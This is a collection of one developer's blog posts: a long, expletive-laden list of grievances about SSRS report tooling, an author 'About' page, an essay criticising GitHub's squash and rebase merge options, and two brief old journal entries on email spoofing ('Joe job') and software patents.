1. [http://blogs.technet.com/b/andrew/archive/2007/12/04/sql-server-2008-reporting-services-no-longer-depends-on-iis.aspx](http://blogs.technet.com/b/andrew/archive/2007/12/04/sql-server-2008-reporting-services-no-longer-depends-on-iis.aspx)
1. http server api (aka http.sys)
1. [https://msdn.microsoft.com/en-us/library/aa364510%28VS.85%29.aspx?f=255&MSPPError=-2147217396](https://msdn.microsoft.com/en-us/library/aa364510%28VS.85%29.aspx?f=255&MSPPError=-2147217396)
1. list reservations:
1. `netsh http show urlacl`
1. auth in reporting [https://msdn.microsoft.com/en-us/library/ms152899.aspx](https://msdn.microsoft.com/en-us/library/ms152899.aspx)
1. reports in VS
1. [http://curah.microsoft.com/22200/create-ssrs-reports-using-visual-studio](http://curah.microsoft.com/22200/create-ssrs-reports-using-visual-studio)
1. [https://msdn.microsoft.com/en-us/library/ms173745.aspx](https://msdn.microsoft.com/en-us/library/ms173745.aspx)
1. "Explicity add new role assingment for the account you are using and check every box in sight" ~ a.n. colleague. lol
1. ignore the .rdl.data files with git.
1. [http://stackoverflow.com/questions/3424928/in-ssrs-is-there-a-way-to-disable-the-rdl-data-file-creation#3425429](http://stackoverflow.com/questions/3424928/in-ssrs-is-there-a-way-to-disable-the-rdl-data-file-creation#3425429)
1. no folders.
1. [https://connect.microsoft.com/SQLServer/feedback/details/487106/allow-sub-folders-in-ssrs-projects](https://connect.microsoft.com/SQLServer/feedback/details/487106/allow-sub-folders-in-ssrs-projects)
1. [http://stackoverflow.com/questions/3309002/visual-studio-for-ssrs-2008-how-to-organize-reports-into-subfolders-in-solutio](http://stackoverflow.com/questions/3309002/visual-studio-for-ssrs-2008-how-to-organize-reports-into-subfolders-in-solutio)
1. renamed a dataset, nothing fucking broke!!!!!!!!!!!!!!!!!!!!!!!!!!! even though there are reports that depend on it. On editing the report's dataset list you can see clearly "not found", but yet it still runs. what in the blazes is that all about?
1. caching in the report editor [http://stackoverflow.com/q/3424928/10245](http://stackoverflow.com/q/3424928/10245)
1. kill the .data cache files [http://stackoverflow.com/questions/3424928/in-ssrs-is-there-a-way-to-disable-the-rdl-data-file-creation](http://stackoverflow.com/questions/3424928/in-ssrs-is-there-a-way-to-disable-the-rdl-data-file-creation)
1. git clean -xfd
1. fuck
1. [https://social.msdn.microsoft.com/Forums/sqlserver/en-US/0aa81692-352f-4c1f-a0e3-95fe6c0797ca/cachedataforpreview-in-rsreportdesignerconfig-not-honored](https://social.msdn.microsoft.com/Forums/sqlserver/en-US/0aa81692-352f-4c1f-a0e3-95fe6c0797ca/cachedataforpreview-in-rsreportdesignerconfig-not-honored)
1. [https://connect.microsoft.com/SQLServer/feedback/details/468482](https://connect.microsoft.com/SQLServer/feedback/details/468482)
1. it's the `bin\` folder, not the .data files. Still, fuckkkk.
1. to get from a report to a db you go, report > report dataset > shared dataset > db, but db is defined in the shared dataset with another name, which can be pointed to a shared data source, which is also named. and *that* data source actually has a connection string
1. committing to tfs failed half way through because vs had locked a bunch of files I didn't even have open
1. found a param with `<Value>=Microsoft.VisualBasic.Strings.Join(Parameters!Stages.Label, ", ")</Value>` - wtf.
1. function overload matching warning wouldn't go away till I closed the sln
1. localisation is a bitch
1. [http://stackoverflow.com/questions/10953629/how-to-change-ssrs-2008-locale](http://stackoverflow.com/questions/10953629/how-to-change-ssrs-2008-locale) etc
1. [http://blog.ponytailbob.com/2007/10/multi-language-tips-in-ssrs.html](http://blog.ponytailbob.com/2007/10/multi-language-tips-in-ssrs.html)
1. [http://blogs.msdn.com/b/sriram_reddy1/archive/2012/01/09/localization-in-ssrs-reports.aspx](http://blogs.msdn.com/b/sriram_reddy1/archive/2012/01/09/localization-in-ssrs-reports.aspx)
1. [https://support.microsoft.com/en-gb/kb/919153](https://support.microsoft.com/en-gb/kb/919153)
1. [http://www.keepitsimpleandfast.com/2011/09/localization-of-your-ssrs-reports.html](http://www.keepitsimpleandfast.com/2011/09/localization-of-your-ssrs-reports.html)
1. why you no use User!Language??
1. Visual Studio 2013 crashed. hard. while cancelling new report param
1. adds 00:00:00 to date fields from sql server. duuuuuuuuuuuuh (goes via .net datetime internally, but even so, not friendly)
1. changed date format, looks fine in VS, but no change in report server. wuh? deploy all
1. no auto-sizing of cols [http://stackoverflow.com/questions/7851045/ssrs-tablix-column-cangrow-property-for-width](http://stackoverflow.com/questions/7851045/ssrs-tablix-column-cangrow-property-for-width)
1. no nulls in multi-value [http://www.keepitsimpleandfast.com/2012/03/how-to-pass-null-value-to-multi-value.html](http://www.keepitsimpleandfast.com/2012/03/how-to-pass-null-value-to-multi-value.html)
1. need dirty hack to show "all" rather than full list
1. [http://www.mssqltips.com/sqlservertip/2844/working-with-multiselect-parameters-for-ssrs-reports/](http://www.mssqltips.com/sqlservertip/2844/working-with-multiselect-parameters-for-ssrs-reports/)
1. [http://stackoverflow.com/questions/12917261/optional-multi-valued-parameters-in-ssrs](http://stackoverflow.com/questions/12917261/optional-multi-valued-parameters-in-ssrs)
1. [http://www.bi-rootdata.com/2012/09/efficient-way-of-using-all-as-parameter.html](http://www.bi-rootdata.com/2012/09/efficient-way-of-using-all-as-parameter.html)
1. [http://blog.ponytailbob.com/2007/10/2-shortcomings-of-multi-valued.html](http://blog.ponytailbob.com/2007/10/2-shortcomings-of-multi-valued.html)
1. some fucking horror I've yet to encounter (querystrings) [http://stackoverflow.com/questions/512105/passing-multiple-values-for-a-single-parameter-in-reporting-services](http://stackoverflow.com/questions/512105/passing-multiple-values-for-a-single-parameter-in-reporting-services)
1. it has a fucking canvas size that will push over to 2 pages
1. the font kerning on a print is massively different to on web / design view
1. sorting
1. [http://stackoverflow.com/questions/9254604/why-does-my-sql-server-reporting-service-ssrs-report-appear-to-re-sort-the-d](http://stackoverflow.com/questions/9254604/why-does-my-sql-server-reporting-service-ssrs-report-appear-to-re-sort-the-d)
1. "Index was out of range. Must be non-negative and less than the size of the collection. Parameter name: index " from editing xml. thanks for the error info. fuckkkkkers
1. the ssrs gui editor is a flaky piece of shit
1. doesn't select the right fucking textbox in the props window
1. had to restart visual fuckigjn studio
1. grrr
1. the underlying xml is fucking horrific
1. `<rd:Selected>true</rd:Selected>` ----- what in the fucking blazes is that doing in there?
1. how do you deploy without connecting visual studio to production server? you fucking don't hahahahahaa
1. powerhell [https://gist.github.com/timabell/7e3019bd2de802f0b259](https://gist.github.com/timabell/7e3019bd2de802f0b259)
1. ssbi install croaked - h[ttps://support.microsoft.com/en-us/kb/2800050?wa=wsignin1.0](ttps://support.microsoft.com/en-us/kb/2800050?wa=wsignin1.0)
1. [09:44:53] john doe: Tim can I have a `.bak` file of `ReportServer$MSSQL2012TempDB` which the stupid software seems to be unable to operate without even though it has **Temp** in the database name implying it will rebuild itself (at least that's what it implies to me)
1. [09:47:48] Tim Abell: (facepalm)
1. [09:47:49] Tim Abell: sure
1. [09:48:08] Tim Abell: I did wonder, and then I thought, no they couldn't possibly need that
1. dropdown doesn't work in firefox
1. no debugging [http://stackoverflow.com/a/14068447/10245](http://stackoverflow.com/a/14068447/10245)
1. Warning : The text box ‘appliedFilters’ and the image ‘urLogo’ overlap. Overlapping report items are not supported in all renderers.
1. the only options for DRY in reports suck balls [http://www.3pillarglobal.com/insights/tips-tricks-ensure-consistency-sql-server-reporting-services-reports](http://www.3pillarglobal.com/insights/tips-tricks-ensure-consistency-sql-server-reporting-services-reports)
1. [http://harmful.cat-v.org/software/xml/](http://harmful.cat-v.org/software/xml/) xml is a terrible format anyway
1. layout is in inches
1. you can change the layout to cm
1. it stores different metrics (cm/in) for each element, wtf, pick a unit
1. reflowing nicely is impossible
1. layout engine is as intelligent as a piece of paper and a pen. x,y is all you get.
1. [http://www.webapplicationsuk.com/2010/07/word-html-renderer-ndash-the-road-to-hellhellip/](http://www.webapplicationsuk.com/2010/07/word-html-renderer-ndash-the-road-to-hellhellip/)
1. [https://connect.microsoft.com/SQLServer/feedback/details/540183/supported-rdl-object-model-rdlom](https://connect.microsoft.com/SQLServer/feedback/details/540183/supported-rdl-object-model-rdlom)
1. this is the kind of bullshit that counts for helpful content on the net [https://social.msdn.microsoft.com/Forums/en-US/86205ca4-13d0-4ca6-84f1-79797616f0f4/exclude-null-values-from-sum-and-avg-calculation?forum=sqlreportingservices](https://social.msdn.microsoft.com/Forums/en-US/86205ca4-13d0-4ca6-84f1-79797616f0f4/exclude-null-values-from-sum-and-avg-calculation?forum=sqlreportingservices) - `=sum(forum_format * quality_of_community)` = errorrrrrrrrr
1. multiple rdl xml schema in the same fucking project, completely different xml structure
1. 2005 generated with "new report wizard" in VS 20-fucking-13: `<Report xmlns="http://schemas.microsoft.com/sqlserver/reporting/2005/01/reportdefinition" xmlns:rd="http://schemas.microsoft.com/SQLServer/reporting/reportdesigner">`
1. 2008 `<Report xmlns="http://schemas.microsoft.com/sqlserver/reporting/2008/01/reportdefinition" xmlns:rd="http://schemas.microsoft.com/SQLServer/reporting/reportdesigner">`
1. 2009 from <https://technet.microsoft.com/en-us/library/cc627465%28v=sql.105%29.aspx> - `<Report xmlns:rd=http://schemas.microsoft.com/SQLServer/reporting/reportdesigner xmlns="http://schemas.microsoft.com/sqlserver/reporting/2009/01/reportdefinition">`
1. 2010 `<Report xmlns:rd="http://schemas.microsoft.com/SQLServer/reporting/reportdesigner" xmlns:cl="http://schemas.microsoft.com/sqlserver/reporting/2010/01/componentdefinition" xmlns="http://schemas.microsoft.com/sqlserver/reporting/2010/01/reportdefinition">`
1. how many fucking versions??!
1. [http://stackoverflow.com/questions/15539859/what-is-the-difference-between-rdl-2008-schema-and-rdl-2010-schema-feature-wise](http://stackoverflow.com/questions/15539859/what-is-the-difference-between-rdl-2008-schema-and-rdl-2010-schema-feature-wise)
1. [http://stackoverflow.com/questions/9974179/is-there-a-new-version-of-rdl-schema-for-sql-server-2012-denali](http://stackoverflow.com/questions/9974179/is-there-a-new-version-of-rdl-schema-for-sql-server-2012-denali)
1. [http://stackoverflow.com/questions/29951653/ssrs-2008r2-visual-studio-2008-and-2008-and-2010-schemas](http://stackoverflow.com/questions/29951653/ssrs-2008r2-visual-studio-2008-and-2008-and-2010-schemas) - how to not end up with old schema?!
1. [https://social.msdn.microsoft.com/Forums/sqlserver/en-US/f4d14548-c592-4d8d-8185-ca683c421649/2010-schema-with-visual-studio-2010?forum=sqlreportingservices](https://social.msdn.microsoft.com/Forums/sqlserver/en-US/f4d14548-c592-4d8d-8185-ca683c421649/2010-schema-with-visual-studio-2010?forum=sqlreportingservices)
1. how do you upgrade a report schema? install a massive chunk of fucking sql server [http://stackoverflow.com/questions/13170608/upgrade-my-rdlc-schema-from-2008-01-to-2010-01](http://stackoverflow.com/questions/13170608/upgrade-my-rdlc-schema-from-2008-01-to-2010-01)
1. [17:54:48] john doe: Btw have you noticed that in Print Layout view the header doesn't expand if any of the textboxes have auto-grown?
[17:55:14] <NAME>ell: that's because ssrs is a piece of shit from 1990
[17:55:28] <NAME>: and it thinks A4 is the ultimate display format
[17:55:47] <NAME>: you just have to guess how much space you'll need
1. the ordering of the xml in the proj file is unstable causing diff noise
1. subreports, icky [http://bhushan.extreme-advice.com/subreport-in-ssrs/](http://bhushan.extreme-advice.com/subreport-in-ssrs/)
1. or nested tables [http://stackoverflow.com/questions/11335655/filtering-nested-data-regions-in-ssrs](http://stackoverflow.com/questions/11335655/filtering-nested-data-regions-in-ssrs)
1. some things can only be achieved with subreports, and they have to be deployed separately from the main report, meaning they can get out of sync. enjoy the fear of not knowing if you'll break something else when you upload your new version of the subreport you depend on
1. no support for "time" data type [http://stackoverflow.com/questions/3846378/displaying-time-in-reporting-services-2008](http://stackoverflow.com/questions/3846378/displaying-time-in-reporting-services-2008)
1. The "View Report" button next to the parameters when running a report in VS is *always* greyed-out, even though it actually works.
1. wow that's mental, hidden reports show in details view and not in tile view in the ssrs web ui
1. the report editor has a copy option for report items, but no paste, so you can't duplicate reports
1. actually you can, but only if you know the keyboard shortcuts. 0_o - ctrl-c ctrl-v
1. duplicating a report on the filesystem, and then using "add existing item" to include it puts it at the end of the list... until you rename it and then it's moved into alphabetical order causing a spurious diff. should have put in the right place in the first place. grr.
1. using the cursor keys to move textboxes around is so laggy that I overshoot every single time
1. the editor popups in visual studio are modal, so you can't refer to anything else
1. and there's no maximise button so you have to drag the fiddly border to make it bigger
1. the report editor hasn't heard of ctrl-c or ctrl-v, have to use ctrl-Ins / shift-Ins instead
1. border rendering / precedence is a fucking mess. set some borders, your report will look like a two-year-old coloured it in, and how it looks changes depending on the zoom level.
1. you have to use VB to do alternate row colours - [http://stackoverflow.com/questions/44376/add-alternating-row-color-to-sql-server-reporting-services-report](http://stackoverflow.com/questions/44376/add-alternating-row-color-to-sql-server-reporting-services-report)
1. if anything goes wrong with an expression all you get is "#Error". Helpful. E.g. [http://stackoverflow.com/q/9144312/10245](http://stackoverflow.com/q/9144312/10245)
1. this one time, at band camp, I edited a report definition in VS and it refused to save the new definition to disk (ctrl-shift-s, ctrl-shift-s!!). wtf. Restarted VS and all the changes were gone.
1. report editor silently adds new parameters to the report when you add new parameters to the sql. seriously. fuck off.
1. RSI-inducing UI for editing the reports. click click click clickity click
1. the sql editor has only a single undo. like ye olde notepad.
1. in the editor, you can right-click copy, you can't right-click paste. wtf. ctrl-v does paste though. wtf again. I know, I already said it, but it's reaaaaaly shit
1. the field list on a dataset is ordinal, allowing you to mismatch the select in the sql from the list of fields in the dataset and not notice
1. how do you align a textbox on the page?
```xml
<Top>0.82546cm</Top>
<Left>0.07309cm</Left>
<Height>0.88964cm</Height>
<Width>2.3025cm</Width>
```
fuck you!!!!
1. one goddam cell in the underlying format:
```xml
<TablixCell>
<CellContents>
<Textbox Name="qty">
<CanGrow>true</CanGrow>
<KeepTogether>true</KeepTogether>
<Paragraphs>
<Paragraph>
<TextRuns>
<TextRun>
<Value>=Sum(Fields!qty.Value)</Value>
<Style />
</TextRun>
</TextRuns>
<Style />
</Paragraph>
</Paragraphs>
<rd:DefaultName>qty</rd:DefaultName>
<Style>
<Border>
<Color>LightGrey</Color>
<Style>None</Style>
</Border>
<PaddingLeft>2pt</PaddingLeft>
<PaddingRight>2pt</PaddingRight>
<PaddingTop>2pt</PaddingTop>
<PaddingBottom>2pt</PaddingBottom>
</Style>
</Textbox>
</CellContents>
</TablixCell>
```
1. Report width limited to 455in (even if I'm hiding columns using parameters against the Visibility column filter).
1. NO DYNAMIC COLUMN CREATION (ridiculous!)
1. Selection of multiple columns and setting attributes is ridiculously flaky. This is because I wanted to reduce the column width and font to comply with Point 71 (max report width)!!
1. We have to restart Reporting Server services frequently or our charts won't show up. Eh?
1. Cut and paste columns? Nope!
1. Disappearing "Report Data" menu: [http://stackoverflow.com/a/28883272/1024](http://stackoverflow.com/a/28883272/10245)
1. SSDT for VS2015 upgrades reports to 2016 schema as soon as they're opened (WAT?!) and ignores the TargetServerVersion being set to <=2014 [http://stackoverflow.com/questions/37816216/deploy-of-a-report-with-ssdt-2016-generates-error](http://stackoverflow.com/questions/37816216/deploy-of-a-report-with-ssdt-2016-generates-error) what if we haven't upgraded our production server, hmmm?
1. Okay so when you run a build, VS2015 then **downgrades** the rdl to the right schema to match the project's target server version before putting it in the build folder. What could possssssibly go wrong. 0_o Complexity++
1. Install SSRS in only 41 easy steps [https://thecodeattic.wordpress.com/category/ssrs/](https://thecodeattic.wordpress.com/category/ssrs/)
1. Build > "Skipping 'SomeReport.rdl'. Item is up to date." - No it isn't, I've deleted it from the friggin bin folder. So clearly it has some stupid cache of what's it thinks is on disk rather than, oh I don't know fucking checking the disk. Sheesh. If it's that optimized why is everything still so damn slow?!
1. Building a project with lots of reports is slow. Even if nothing changed.
1. Intermittently get _"[rsInvalidReportDefinition] The definition of this report is not valid or supported by this version of Reporting Services. The report definition may have been created with a later version of Reporting Services, or contain content that is not well-formed or not valid based on Reporting Services schemas. Details: Data at the root level is invalid."_ - I am not alone. [https://connect.microsoft.com/SQLServer/feedback/details/2988044/randomly-get-rsinvalidreportdefinition-when-previewing-report](https://connect.microsoft.com/SQLServer/feedback/details/2988044/randomly-get-rsinvalidreportdefinition-when-previewing-report) - A rebuild fixes it for me, for a while at least.
1. Sometimes when you edit an embedded dataset it completely fails to persist any of your changes to disk. And when you close the report they are lost. Handy. Thanks fuck for git.
1. Assumes you've never heard of source control and creates numbered backups of report files (notably on auto-upgrade). Also has messages like "_delete will permanently delete this thing_" - no it won't I have source control; I wonder if the SSRS know what that is.
1. I've never managed to crash VS2015 so many times in one day. Omg you didn't click there did you? I wasn't ready! *crash* ... *again*
1. Change the files on disk and the preview window often doesn't notice
1. Preview window silently fires a 'build' of the reports. Sometimes.
1. Generates broken Shared-datasets [http://stackoverflow.com/a/38753141/10245](http://stackoverflow.com/a/38753141/10245)
1. If you break the xml of a shared-dataset the _entire project_ will fail to load. w-t-f.
1. Renaming datasets etc just breaks everything rather than updating references.
1. The `.rptproj` file has a `<state>` tag at the top which is base64 encoded xml (WAT?! xml in xml. eerrrrr), which is information about source control (_arse-about-face or what! source code that controls the *source-control* [that controls the source, that controls the source-control that controls the source...]; even the words are circular!!_). In the base64 you'll find a `<SourceControlInfo>` tag.
```xml
<Project xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" ToolsVersion="2.0">
<State>$base64$PFNvdXJjZUNvbnRyb2xJbmZvIHhtbG5zOnhzZD0iaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY<KEY>State>
...
```
decoded "state" contents:
```xml
<SourceControlInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:ddl2="http://schemas.microsoft.com/analysisservices/2003/engine/2" xmlns:ddl2_2="http://schemas.microsoft.com/analysisservices/2003/engine/2/2" xmlns:ddl100_100="http://schemas.microsoft.com/analysisservices/2008/engine/100/100" xmlns:ddl200="http://schemas.microsoft.com/analysisservices/2010/engine/200" xmlns:ddl200_200="http://schemas.microsoft.com/analysisservices/2010/engine/200/200" xmlns:ddl300="http://schemas.microsoft.com/analysisservices/2011/engine/300" xmlns:ddl300_300="http://schemas.microsoft.com/analysisservices/2011/engine/300/300" xmlns:ddl400="http://schemas.microsoft.com/analysisservices/2012/engine/400" xmlns:ddl400_400="http://schemas.microsoft.com/analysisservices/2012/engine/400/400" xmlns:ddl500="http://schemas.microsoft.com/analysisservices/2013/engine/500" xmlns:ddl500_500="http://schemas.microsoft.com/analysisservices/2013/engine/500/500" xmlns:dwd="http://schemas.microsoft.com/DataWarehouse/Designer/1.0">
<Enabled>true</Enabled>
<ProjectName>SAK</ProjectName>
<AuxPath>SAK</AuxPath>
<LocalPath>SAK</LocalPath>
<Provider>SAK</Provider>
</SourceControlInfo>
```
Enough xml namespaces for you?
1. The state base64 changes all the time causing diff noise.
I know I can't count, but if ssrs is going to make so little effort I don't see why I should. And to be honest "100" seemed a lot more like comic exaggeration when I titled my tomboy note which only had 5 or 6 grumblings in it, I wasn't actually expecting to get within spitting distance of the original number!
Doesn't mean I won't use it again mind, just don't promise to like it.
If you liked this, you might also like the ssrs deployment tool I sometimes look after: [https://github.com/timabell/ssrs-powershell-deploy](https://github.com/timabell/ssrs-powershell-deploy) (mostly not my work, just pulled together a bunch of contributions).
<file_sep>---
layout: page
title: About
permalink: /about/
---
Hi, I'm <NAME> (one of many, but not the
[actor](https://www.imdb.com/name/nm0008543/) or the [other software
dev](https://twitter.com/timabell)).
* I build software.
* I like helping our government do [better digital things](https://www.gov.uk/service-manual/technology).
* I like building things in smart, agile teams who don't take any shit and get
things done.
* I also like working solo.
* I created [SQL Schema Explorer](https://timabell.github.io/schema-explorer/) and
[ef-enum-to-lookup nuget package](https://www.nuget.org/packages/ef-enum-to-lookup).
* I'm learning to be an [entrepreneur](https://www.startupsfortherestofus.com/).
## More stuff in my world
* [Books I've been reading (goodreads)](https://www.goodreads.com/review/list/50628592?shelf=read)
* I love podcasts and audiobooks, here's [my pocast subcriptions](https://timwise.co.uk/podcast-subscriptions.html).
* [Random public code and forks on github](https://github.com/timabell/)
* [Even more random gists](https://gist.github.com/timabell/)
* If we're besties you can [find me on telegram](https://t.me/tim_abell) or Signal but definitely not WhatsApp because facebook has enough data already.
<file_sep>---
title: GitHub rebase and squash considered harmful
layout: post
---
Not to be confused with `git rebase` and the ability to squash commits locally with interactive rebase, which is [a whole other flamewar](/2019/10/14/merge-vs-rebase/).

This post is predicated on giving a crap about the git history you and your team produce. If you don't care about good quality git history then you are wrong because [git history is an important aspect of your engineering output](https://timwise.co.uk/2016/03/18/yet-another-good-commit-messages-post/).
In short, "squash and merge" is never good, "rebase and merge" is almost never good, "create a merge commit" is a good default, ... and if you have a really great team then mainlining while pairing/mobbing can be great for mean-time-to-recovery but shouldn't be the only allowed way.
If you don't believe me yet, then let us now go reaaaally deep on all the details of all the ways you can do this and what makes them so good/bad/evil:
## "Rebase/Squash and merge" - both bad
Personally I dislike the "**rebase**" and "**squash**" buttons on GitHub because:
* You don't find out what you actually put in `main` until after it's done. If you don't believe me check the sha1 of the tip of your PR branch with the new tip of `main`, your sha1 is nowhere to be seen. Github then has the gall to sign the commits as you if you've let it.
* There is no record of which commit you based your branch on, so if there's a new incompatibility because `main` has moved on there is no record of what commit your branch was based on to assist with figuring out where the problem was introduced, it just looks like a bad patch to main with a PR that could never have worked.
* The generated commits lose the true commit metadata generated locally (authorship, timestamps, sha-1).
* GitHub generates brand new commit(s) at the point of applying to `main` with no chance to review first.
These two options behave in ways that are not immediately obvious (to be fair github improved the labels on the options after I first ranted about this, but it doesn't change the fundamental issues). And if you press one of them without realising what it's going to do, tough because it's already in `main`, and if you have branch protection on (you probably should) then you can't even undo it; it's there foreeeeeeeever.
Someone reviewing your PR has no idea which of these three buttons you will push, which could have been the difference between approving (based on a tidy merge and nice branch history) and rejecting a PR (based on including junk history or a badly worded squash commit).
Let's dive in to the hell that github have created for us:
### "Squash and merge" - pure evil
This one takes all your carefully crafted commits (or [pile of "wip" junk](https://xkcd.com/1296/) if you are lazy or plan to squash) and combines them into a single commit, pausing to allow you to write a better commit message (which few people I've worked with bother to actually do, immortalizing "* wip" in the history forever) and then pushing it to `main` without further opportunity to review what you are shipping.
The behaviour this option encourages, nay, mandates, is to create gigantic 100-file patches that make your eyes bleed to read, basically making `git blame` useless beyond knowing who to hate.
Anyone who tries to create many small meaningful and logically coherent patches but who has to use this option has the faustian bargain of choosing between making their team review piles of small PRs (too much overhead) or generating one stinking commit in `main` with all carefully crafted iterations lost to oblivion (for example commit 1: refactor everything, commit 2: make important one-line business change, commit to main: both at once, argh).
Note that github alters your original commit message to retro-fit PR numbers. Also evil.
If you make a change to a file that results in both renaming and modifying files such as a rename-refactor, you can make that easier to follow by doing it in two commits... unless you squash them together. This is exacerbated by [git's rename detection](https://stackoverflow.com/questions/7938582/how-does-git-detect-similar-files-for-its-rename-detection) which is actually not stored at all, but instead done as a heuristic when viewing patches. If you split the file name change and contents change into two patches you can help a future reader follow what you did, but if you change a file too much and then squash it all together then git will treat it as add and delete, breaking the ability to follow a line of code back through history without even more detective work and guessing.
I have nothing good to say about the "Squash and merge" option. If you don't want to see the messy branches of your developers **then use `--first-parent`**. This option in github solves a non-problem and just makes everything worse. Anyone who thinks this option has any merit is wrong.
If an individual developer wants to create a single squashed commit for `main` **they should squash locally and PR that**. This option adds precisely nothing to what is possible, encourages reviewing and shipping junk history and encourages bad behaviour and unreadable patches. If you think it annoys me you're right, it should never have been created. It enables shit developers to carry on being shit and generate less "noise" in the history. Why would you want a process that only exists to to take the edge off being around the worst developers?
### "Rebase and merge" - 99% awful
This option takes your commits, rebases them on `main` and then fast-forwards main to the new top commit.
When this option has been used you can no longer tell by looking at the git history that there was ever a PR, which is actually useful context when looking back to work out why the hell something is how it is. (If you look at the commits in github it does magically show the PR number but you can't find that context any other way.)
This option is marginally less offensive to me if used judiciously by skilled teams. You might sensibly use it because your PR was only for peer review rather than because your commits deserve a logical grouping. If you can trust your team to intelligently decide when the commits in a PR would look nice as straight-line history in `main` then perhaps leave this option available.
If you want your github workflow fool-proof and "scalable" then disable this option. Noobs will find this button and push it for the wrong reasons and give you a shit git history.
The upside of being clever occasionally is outweighed in my experience by the beautiful consistency of everything coming in as "merge PR NNN for feature YYY" and then being able to either ignore the details of the branch with `--first-parent` (which you can't do if someone has used this button), or look at the commits in that PR as a logical group on the second-parent side when you need more granularity (easily done by running a first-parent log on the last commit of the branch before it was merged).
## "Create a merge commit" aka "github flow" - good
My preferred workflow is to use the normal "merge" button every time. This is sometimes know as "[GitHub Flow](https://guides.github.com/introduction/flow/)".
In my view you should generate your commits, sha-1 and all, exactly as they will be merged into `main`, and then as a separate merge commit those should be combined into `main`.
To avoid many "tramlines" do local rebases to avoid PR branches being based on very outdated `main`.
* This retains the commit exactly as you crafted it locally.
* It calls out the difference between you writing your commit and deciding it can go into `main`.
* It retains the information about which commit you based your branch on.
There's something to be said for being able to do a `git log --first-parent origin/main` and get a consistent list of merged PR branches. It's really quite readable compared to a mishmash of the different styles of merge to `main`.
You can configure GitHub to disallow the other options if your team are on-board with the idea.
You could argue that single commit PRs are a lot of overhead for something trivial, but equally having to decide each time results in more time worrying about whether something justifies the special treatment of ending up directly on main (in GitHub's modified form), and getting it wrong sometimes.
If your PR branches are full of "wip", "fix tests" and other junk then the answer is not to throw this option out, the answer is to **get better at creating good patch sets** by learning to use `git rebase --interactive` and thinking harder about what would make good patch before you start typing in your IDE. (And noticing when your patch is getting messy and stopping to reflect on good patch generation).
I'm aware there are counter-arguments, but in my experience on many teams this seems to end up being the cleanest balance of trade-offs. If you are an individual developer on your own project then pure mainline development can make more sense, though even then thinking of feature branches and having them explicitly merged where appropriate can neatly group related commits. The only compelling argument I've heard against this flow is mean-time-to-fix, but that doesn't mean you have to kill this approach entirely, just be able to use other approaches too.
## But my interface can't do first-parent!
Someone once complained at me that we shouldn't do merge commits because they make no sense when viewed in github's deficient history viewer, which shows a random mishmash of mainline and branch commits with no indication of which is which.
Seriously, use a better git viewer, there are literally thousands.
It 100% sucks that github, the flagship platform for git, still to this day does not have a proper branch view let alone first-parent view. Appalling. I'm even more horrified that [GitHub desktop](https://github.com/desktop/desktop/issues/1634) has inherited this idiotic denial of branch based views. If the view of history / PRs in github doesn't show you what you need **don't use it**. Did you know you can review PRs by just pulling down the branch and looking at it locally? You are a capable programmer who uses many tools not an idiot that needs to be spoonfed powerpoint presentations.
Even visual studio can show you branches, merges and first-parent views, it's just a little tricky to find because they insisted on calling everything by different names and using mystery-meat buttons.
Sorry, but I don't have much sympathy with the "my tool is shit so we should do a worse job" complaint against doing things properly, it's weak.
## The case against PRs
The only team I have ever come across that (incorrectly) disabled the "create a merge commit" option did so (I believe) in the name of "mean-time-to-recovery". This is however a false dichotomy.
If you want fast "mean time to recovery" (MTTR) you need to be able to ship a patch to `main` and on to production fast. There is nothing about the *ability* to create merge commits or use PRs that prevents that. So long as you don't enable the "require a PR" option in github, there's nothing to stop a team pushing straight to `main` when that's the right thing to do.
I like the idea that the requirement is not a pull request, but just two pairs of eyes on everything. That gives you the ability to be more responsive as pairs can now ship straight to production. That said, I just don't buy the idea of "mainline development" for every patch. Some changes are just more complicated than a single patch and it's good to be able to break things down in a branch before merging. Don't get me wrong, I'm all for pulling groundwork out and mainlining it (if your dev team is good enough to do this) so that your final patch is smaller, but sometimes a feature change has to go in in one commit to `main`, and without a branch plus a merge commit to main it is just not granular enough to make a useful history. And no, feature flags will not fix this for you, they are a useful thing for sure, and can reduce the size of unmerged branches, but sometimes you just have to change fundamental things that can't be "flagged".
Team culture is worth considering, regardless of tool configuration. If your team does everything by PR then when something is on fire they'll probably raise a PR and then sit around waiting for approval; and if your team always commits everything to main as they go they'll recover fast but their history will be full of mis-steps and fixups that could have been dealt with before they ever hit main. As always extremes are bad and anyone who fast-talks you into believing one extreme is a panacea is glossing over important nuance and interesting counter-examples.
Disabling merge commits doesn't prevent people from having slow PR based async processes, and equally, enabling merge commits and PRs doesn't stop you shipping a quick patch by pushing straight to main when something's on fire. The two things are orthogonal.
## Perfection?
So what's the ideal? In my view it's the one of the following depending on the quality of your team and what your goals are:
### High performing team with top-end developers - reducing mean-time-to-fix
* Two pairs of eyes rule.
* Don't disable anything, just educate and trust
* (... apart from branch protection to avoid force-push to main because forward-only is good)
* (...... and you can probably tell I wouldn't mind if you did disable squash and perhaps rebase given the above ranting).
* Use judgement for when to pair, mainline, PR etc.
* Practice all approaches so that team is used to fast fixes.
Trust your team to use the right tool in the right moment. Big hairy feature? Break it down, use PRs if useful, ship as a merge commit with nice history and link to story and PR. Production on fire? Pair/mob and mainline that sucker.
### Mediocre / mixed team, avoiding breakages over fast-fix
* Require PR for all changes.
* Disable everything but "create merge commit".
* Review PRs for quality of commit list and require rewriting branch history till it's up to team standards before merging.
<file_sep>---
title: "Own a domain? Then Fear the \"Joe Job\""
date: 2004-04-08
slashdot_url: https://slashdot.org/journal/67777/own-a-domain-then-fear-the-joe-job
---
<p>Just read <a href="http://www.sitepoint.com/article/sabotage-coping-joe-job">this</a> article on <a href="http://www.sitepoint.com/">sitepoint</a> whilst looking into php mysql.<br>I received the fear.</p>
<p>--</p>
<p>Synopsis:<br>You upset someone, they send thousands of emails to your customers and anyone else with an email address, using your email address.<br>You drown under the response, taking your business with you.<br>This article is the survival tactics.</p>
<file_sep>---
title: "no patents on software!!"
date: 2005-07-06
slashdot_url: https://slashdot.org/journal/111220/no-patents-on-software
---
<p>Woo!<br><a href="http://news.bbc.co.uk/1/hi/technology/4655955.stm">http://news.bbc.co.uk/1/hi/technology/4655955.stm</a></p>
<p>see also<br><a href="http://ffii.org/">http://ffii.org/</a><br><a href="http://www.eff.org/">http://www.eff.org/</a></p>
